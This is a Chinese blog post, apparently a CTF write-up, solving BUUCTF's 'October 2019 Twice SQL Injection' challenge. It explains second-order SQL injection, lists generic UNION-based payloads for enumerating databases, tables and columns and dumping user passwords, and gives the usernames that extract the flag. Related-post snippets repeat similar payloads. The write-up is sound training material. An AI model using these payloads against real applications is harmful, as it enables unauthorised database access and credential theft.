[BUUCTF解析]-October 2019 Twice SQL Injection

原创 于 2025-10-24 23:05:42 发布 · 293 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#1024程序员节 #ctf #buuctf

看名字应该就知道是间接的注入。

二次注入:

即使用了addslashes 、get_magic_quotes_gpc、mysql_escape_string、mysql_real_escape_string等函数,导致实际存储在数据库中是没有转义的数据,这样读取的时候就可以被当做指令执行。

首先随便注册并登入一个账号,这里面有info信息

所以猜测是

info = "SELECT info_content FROM info WHERE username = '$logged_in_username'";

那么只需要在注册时候提前写好sql注入语句,就可以在info中回显

分享常见sql注入语句(这里的1,3是非回显点)

union select null,version(),null#

union select 1,database(),3#

union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#

union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'#

union select 1,username,password from users limit 1#

union select group_concat(password) from users#

开始解题

注册名为  1' union select database() #

    注册名为  1' union select group_concat(table_name) from information_schema.tables where database()=table_schema#

      注册名为  1' union select group_concat(column_name) from information_schema.columns where table_name="flag"#

        注册名为  1' union select group_concat(flag) from flag#

        网络安全的学习之路需要持续的输入和交流。如果你觉得这篇教程对你有所帮助,我的知识星球「网络安全干货精选」或许能为你提供更多价值。直达链接:https://t.zsxq.com/akza7

        这里是一个专注于网安干货分享的社群,内容涵盖:

        1.CTF解题技巧与工具实战

        2.​​红蓝对抗中的工具与战术

        3.前沿漏洞分析与利用实践

        4.每周精选的高质量安全资讯

        期待与你在这个小圈子里相遇,共同交流切磋,快速成长。

        臻荣
        关注
        buuctf XCTF October 2019 Twice SQL Injection 二次注入原理+题解
        AAAAAAAAAAAA66的博客
        12-21 3344
        这里要吐槽一点XCTF,之前翻题目时发现有道10分的,还是二次注入,还是0人做出,看了write up觉得还挺简单,就想混着写一下,结果0人做出的原因居然是环境打不开。然后在buuctf 平台找到了这道题,所以就试着写下write up。 目录 二次注入 二次注入的成因 二次注入常出现的地方 题解 思路 步骤 二次注入 二次注入的成因 由于开发者为了防御sql注入,使网站对我们输入的恶意语句中的一些重要的关键字进行了转义,使恶意的sql注入无法执行(比如说将单引号转义...
        BUUCTF_Web(October 2019 Twice SQL injection
        2401_87524087的博客
        01-19 989
        当用户提交的恶意数据被存入数据库后,应用程序再把它读取出来用于生成新的SQL语句时,如果没有相应的安全措施,是有可能发生SQL注入的,这种注入就叫做二次注入。重新注册账号为admin'unionselectdatabase()#,密码123(此处此方法无用,账号必须是数字,)开发者默认存入数据库的数据都是安全的,在进行查询时,直接从数据库中取出恶意数据,没有进行进一步的检验的处理。1.注册一个用户名为:1'的用户,然后登录后在info页面发现没有数据,相当于报错。同上注册,登陆,得flag。
        BUUCTF--October 2019 Twice SQL Injection
        qq_46263951的博客
        07-30 1260
        根据题目可以知道这是一个二次注入题 注册时把我们sql语句放到username处,登录后即可看到我们想要的信息 payload为: username =1' union select database() # username =1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' # username =1' union select gr
        BUU刷题记录——5
        weixin_43610673的博客
        09-21 2081
        October 2019 Twice SQL Injection 由题目名可知为二次注入 username =1' union select database() # username =1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' # username =1' union select group
        BUUCTFOctober 2019 Twice SQL Injection1及知识点整理
        2401_86760082的博客
        01-24 1257
        二次注入知识点、爆出数据库名、爆出表名、爆出字段
        October 2019 Twice SQL Injection
        夜风的博客
        05-16 531
        这里的bs4模块,只是让结果更简介,去掉了html的标签,不要这个也没事,下载方法自己百度吧,因为我也是百度的,我自己只会pip instlal +模块名字 -i。无非就是注意自己的python版本,有时候编者用的python2编写,但你的环境是python3, 而有些模块在不同python版本的名字是不一样的。怎么说呢,我觉得这个题适合我们练习脚本的编写,方法是最简单的联合注入(union select),但需要保持会话(session)下载模块的时候无非就是注意这几点,其他没什么的。
        2025.1.18——五、Twice SQL Injection 1 二次注入|注入三爆|一点代码审计
        2402_87387800的博客
        01-18 641
        题目来源:buuctfOctober2019TwiceSQLInjection1。
        详解强大的SQL注入工具——SQLMAP
        05-09
        SQL注入是一种常见的网络安全攻击技术,用于攻击数据驱动的应用程序,攻击者通过在应用程序的SQL命令中插入恶意SQL代码,从而控制数据库服务器。SQLMAP是一个开源的渗透测试工具,专门用于自动探测和利用SQL注入漏洞...
        buuctf-web-October 2019 Twice SQL Injection1
        mlws1900的博客
        03-12 611
        重新注册账号为admin' union select database()#,密码123456(此处此方法无用,账号必须是数字)随后就是sql注入常规操作,爆库爆表爆字段读内容,继续注册账户名带注入语句的用户。注册账号为1' union select database()#,密码为123。重新登录,发现显示数据库为ctftraining。到注册界面随便注册一个用户后登录。看这题目,二次注入,打开环境。
        二次SQL注入
        2401_86190146的博客
        03-09 789
        用户向数据库存入恶意数据,当数据被送进数据库的时候,会对存入的信息进行转义然后再储存,但是存进去的数据会再次被转义回来(也就是原样不变的存进数据库里,只是害怕攻击者在存入数据的时候捣蛋而已),一般默认数据库里的数据都是安全的,所以当用户再次访问时,要从数据库里拿出数据来,这时候就不会再进行转义处理,此时会引起SQL注入。
        buu-October 2019 Twice SQL Injection
        qaq517384的博客
        10-26 631
        标题朴实无华的二次注入 两个注入点,注册和改info rua' union select database() # 在注册的user处可以找到二次注入点 没有特殊的过滤,四步正常走就行 rua' union select database() # rua' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' # rua' union select gro
        BUUCTF-[SUCTF 2019]EasySQL
        qq_44657899的博客
        02-27 3869
        打开题目, 测试发现过滤了很多字符,不过可以堆叠注入: 1;show tables;# 然后尝试读取表Flag, 发现union,prepare,handler等都过滤了,基本我会的方法都过滤了。。。 看了看wp,说是比赛时题目泄露了源码 select $_GET['query'] || flag from flag 然后有两种解 解题思路1: payload:*,1 查询语句:selec...
        BUUCTF-2020寒假刷题记录
        qq_33624424的博客
        06-26 3736
        BUUCTF-2020寒假刷题记录 Web [RoarCTF 2019]Easy Calc 打开源码,看到calc.php,打开看到源码。 在 num 前面加个空格即可绕过 ? num=phpinfo(); calc.php? num=print_r(scandir(chr(47))) 列出目录 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-1JiYRIUE-1593173106930)(https://i.loli.net/2020/01/19/8HzGU3tFQPIVa
        【Java设计模式】单例模式七种实现方案对比:线程安全、性能与适用场景深度解析
        12-16
        内容概要:文章深入剖析了Java中单例模式的七种实现方式,包括饿汉式、懒汉式(线程不安全与线程安全)、双重检查锁定(DCL)、静态内部类、枚举单例和容器式单例,详细讲解了每种写法的实现原理、优缺点及适用场景,并从性能、线程安全、代码可读性等多个维度进行对比分析,最终指出应根据实际应用场景选择最优方案。同时强调枚举单例在防止反射和序列化破坏方面的优势,以及静态内部类和DCL在延迟加载与性能之间的平衡。; 适合人群:具备一定Java基础,熟悉面向对象设计和多线程编程,工作1-3年的开发人员或希望深入理解设计模式原理的技术人员。; 使用场景及目标:①理解单例模式在高并发环境下的线程安全实现机制;②掌握如何避免反射和序列化破坏单例;③在实际项目中根据需求选择最优的单例实现方式,提升系统稳定性与性能。; 阅读建议:此资源不仅展示代码实现,更注重原理剖析和场景对比,建议结合JVM类加载机制、指令重排、synchronized与volatile关键字等知识点深入理解,并通过动手实践和调试加深对各种写法差异的认识。
        内镜检查腺瘤性息肉和增生性息肉识别数据集,支持pascal voc xml,识别率可达99.4%,已标注好
        12-16
        数据集图片和标注详情可点击博客链接查看详情: https://backend.blog.youkuaiyun.com/article/details/155979179
        含中间直流的三相电力电子变压器PET仿真模型(Simulink仿真实现)
        最新发布
        12-16
        含中间直流的三相电力电子变压器PET仿真模型(Simulink仿真实现)内容概要:本文档介绍了含中间直流环节的三相电力电子变压器(PET)的Simulink仿真模型,重点在于构建适用于综合能源系统与电网优化调度的电力电子变换装置仿真平台。该模型可用于研究PET在柔性负荷、低碳经济调度、新能源接入等场景下的运行特性与控制策略,结合文中提及的多领域仿真资源,突出其在电力系统智能化管理中的关键作用。文档还列举了大量相关科研仿真案例,涵盖微电网优化、储能配置、负荷预测及电力电子变换器建模等内容,形成以电力系统为核心的多技术交叉仿真体系。; 适合人群:电气工程、自动化、能源系统等相关专业的研究生、科研人员及从事电力电子与智能电网开发的工程技术人员。; 使用场景及目标:①用于电力电子变压器PET的拓扑结构与控制策略研究;②支撑综合能源系统、微电网、储能优化等领域的仿真验证;③为含高比例可再生能源的电网低碳经济调度提供模型基础;④配合Matlab/Simulink环境开展教学与科研建模。; 阅读建议:建议结合文档中提供的网盘资源下载完整仿真模型,重点关注PET的中间直流环节建模与系统级集成应用,同时可参考文中列出的优化算法与控制策略实现方法,进行二次开发与仿真验证。
        postgre 15.12数据库的tar镜像
        12-16
        postgre 15.12数据库的tar镜像
        October 2019 Twice SQL Injection 1
        03-24
        好的,我需要处理用户关于2019年10月Twice SQL注入漏洞的询问。首先,我要回顾已有的引用内容,确保准确提取关键点。 根据提供的引用,特别是引用[1]到[4],这个漏洞涉及二次注入。用户提到的问题需要详细描述漏洞...
        评论
        添加红包

        请填写红包祝福语或标题

        红包个数最小为10个

        红包金额最低5元

        当前余额3.43前往充值 >
        需支付:10.00
        成就一亿技术人!
        领取后你会自动成为博主和红包主的粉丝 规则
        hope_wisdom
        发出的红包
        实付
        使用余额支付
        点击重新获取
        扫码支付
        钱包余额 0

        抵扣说明:

        1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
        2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

        余额充值